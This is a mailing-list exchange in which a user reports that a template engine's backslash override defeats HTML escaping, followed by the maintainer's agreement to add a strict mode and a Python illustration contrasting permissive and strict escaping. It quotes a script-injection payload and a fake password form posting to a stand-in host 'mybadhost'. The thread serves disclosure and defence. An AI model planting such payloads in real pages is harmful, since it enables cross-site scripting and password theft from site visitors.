> Well, I have one major concern: If I'm using $escmode = 3 (which is
> pretty standard and secure at first look) HTML tags are properly
> escaped. But there is a backdoor: \<. This makes XSS hacks possible
> again and your web site very insecure. E.g. enter in an input field the
> following data, which is typically displayed later in an HTML output page:
>
> \<script\>alert('hi, this should never occur')\<script\>
>
> or not so innocent:
>
> \<form action=http://mybadhost/cgi-bin/getpasswd\>\<input type=password\>
> Please enter your password for a double check<\form\>
>
> So what I'm suggesting, Gerald, is just a new escape mode which just
> never allows backslash escaping tags.
>

Yes, such an escmode is highly necessary

> Or am I just telling old stories here?
>

I already thought about this problem, but didn't have the time to think it
through to the end...

I will add it as soon as possible

Gerald
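The weakness discussed above, as an added illustration that is not code from this thread or from the template engine it concerns: a model of an escape mode where a backslash before an HTML-special character suppresses its escaping (the rule is assumed from the description in the post), placed beside a strict mode that treats the backslash as ordinary data, plus a small check a reviewer can run over rendered output.

```python
# Assumed model of the two escape modes; not the project's real implementation.
# Permissive mode: HTML-special characters are escaped unless preceded by a
# backslash, in which case the backslash is dropped and the character passes
# through raw. Strict mode: every special character is escaped, always.

SPECIAL = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;"}


def escape_permissive(text):
    """Escape HTML, but honour '\\<' style overrides (the weak behaviour)."""
    out = []
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text) and text[i + 1] in SPECIAL:
            # The override: user-controlled data can switch escaping off
            # for one character, so attacker input reaches the page raw.
            out.append(text[i + 1])
            i += 2
            continue
        out.append(SPECIAL.get(ch, ch))
        i += 1
    return "".join(out)


def escape_strict(text):
    """Escape every special character; a backslash has no special meaning."""
    return "".join(SPECIAL.get(ch, ch) for ch in text)


def contains_raw_markup(rendered):
    """Check for rendered output: True if any angle bracket survived."""
    return "<" in rendered or ">" in rendered


# Constructed sample input, shaped like the payload quoted in the thread.
USER_INPUT = r"\<script\>alert('hi, this should never occur')\<script\>"

if __name__ == "__main__":
    for name, fn in (("permissive", escape_permissive), ("strict", escape_strict)):
        rendered = fn(USER_INPUT)
        print(f"{name:10s} raw markup: {contains_raw_markup(rendered)}  {rendered}")
```

Under the permissive mode the backslashes vanish and a live tag is emitted; under the strict mode the backslashes are kept as literal text and every bracket is entity-encoded.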

